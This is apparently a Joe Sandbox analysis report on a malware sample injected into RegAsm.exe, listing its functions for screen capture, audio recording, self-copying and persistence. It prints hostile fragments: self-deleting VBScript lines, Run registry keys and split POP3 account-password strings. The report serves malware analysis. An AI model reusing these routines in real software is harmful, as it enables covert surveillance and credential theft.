                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                        • String ID:
                                                                        • API String ID: 1084509184-0
                                                                        • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                        • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                                        • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                        • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                                        Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                        • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                        Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                                        • DeleteObject.GDI32(00000000), ref: 00418F30
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                                        • DeleteDC.GDI32(00000000), ref: 00418F62
                                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                                        • GetCursorInfo.USER32(?), ref: 00418FA7
                                                                        • GetIconInfo.USER32 ref: 00418FBD
                                                                        • DeleteObject.GDI32(?), ref: 00418FEC
                                                                        • DeleteObject.GDI32(?), ref: 00418FF9
                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                                        • DeleteDC.GDI32(?), ref: 0041917C
                                                                        • DeleteDC.GDI32(00000000), ref: 0041917F
                                                                        • DeleteObject.GDI32(00000000), ref: 00419182
                                                                        • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                        • DeleteObject.GDI32(00000000), ref: 00419241
                                                                        • GlobalFree.KERNEL32(?), ref: 00419248
                                                                        • DeleteDC.GDI32(?), ref: 00419258
                                                                        • DeleteDC.GDI32(00000000), ref: 00419263
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                        • String ID: DISPLAY
                                                                        • API String ID: 4256916514-865373369
                                                                        • Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                                        • Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                                        Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,`2U,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                                        • ExitProcess.KERNEL32 ref: 0040D7D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                        • API String ID: 1861856835-332907002
                                                                        • Opcode ID: d6bdc6585a4e4fb30af1d5b39ccbf0b4685936c32e7406392716d295adf9b9e3
                                                                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                                        • Opcode Fuzzy Hash: d6bdc6585a4e4fb30af1d5b39ccbf0b4685936c32e7406392716d295adf9b9e3
                                                                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                                        Function 0040D096 Relevance: 44.0, APIs: 6, Strings: 19, Instructions: 260registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,`2U,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63A21986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                                        • ExitProcess.KERNEL32 ref: 0040D419
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`2U$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                        • API String ID: 3797177996-3565920307
                                                                        • Opcode ID: 05e3ec18fa8463a6322569f1bb3c1d7af6336844a107ad2f8429c4fb3964e9d7
                                                                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                                        • Opcode Fuzzy Hash: 05e3ec18fa8463a6322569f1bb3c1d7af6336844a107ad2f8429c4fb3964e9d7
                                                                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                                        Function 00412475 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,@5U,00000003), ref: 00412494
                                                                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                                        • lstrcatW.KERNEL32 ref: 00412601
                                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                                        • Sleep.KERNEL32(000001F4), ref: 00412682
                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                        • String ID: .exe$8SG$@5U$WDH$exepath$open$temp_
                                                                        • API String ID: 2649220323-645615128
                                                                        • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                                        • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                                        Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                                        • SetEvent.KERNEL32 ref: 0041B219
                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                                        • CloseHandle.KERNEL32 ref: 0041B23A
                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                        • API String ID: 738084811-2094122233
                                                                        • Opcode ID: c2dffa3932ea448a70c857dca7e5090a6bd86c42919e5ddd10193c91cbe91aa0
                                                                        • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                        • Opcode Fuzzy Hash: c2dffa3932ea448a70c857dca7e5090a6bd86c42919e5ddd10193c91cbe91aa0
                                                                        • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                        Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Write$Create
                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                        • API String ID: 1602526932-4212202414
                                                                        • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                        • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                        • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                        • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                        Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,`2U,004076CE), ref: 00407284
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                        • API String ID: 1646373207-255920310
                                                                        • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                        • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                        • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                        • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                        Function 0040CDF9 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 0040CE07
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,@5U,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                        • CopyFileW.KERNEL32 ref: 0040CED0
                                                                        • _wcslen.LIBCMT ref: 0040CEE6
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                        • CopyFileW.KERNEL32 ref: 0040CF84
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                        • _wcslen.LIBCMT ref: 0040CFC6
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                        • CloseHandle.KERNEL32 ref: 0040D02D
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                        • ExitProcess.KERNEL32 ref: 0040D062
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                        • String ID: 6$@5U$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$`2U$del$open
                                                                        • API String ID: 1579085052-3739255467
                                                                        • Opcode ID: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                                                                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                        • Opcode Fuzzy Hash: 37bf41b36f569e96123a73dee1261e03dac0feab31b5a087a033d73400f0ce52
                                                                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                                        Function 0044F42D Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 419COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$EnvironmentVariable
                                                                        • String ID: 0;U
                                                                        • API String ID: 1464849758-4237915841
                                                                        • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                        • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                        • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                                        • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                        Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                        • API String ID: 4218353326-3023110444
                                                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                        • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                        • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                        Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                        • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                        • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                        • _wcslen.LIBCMT ref: 0041C13B
                                                                        • FindVolumeClose.KERNEL32 ref: 0041C15B
                                                                        • GetLastError.KERNEL32 ref: 0041C173
                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                        • lstrcatW.KERNEL32 ref: 0041C1B9
                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                        • GetLastError.KERNEL32 ref: 0041C1D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
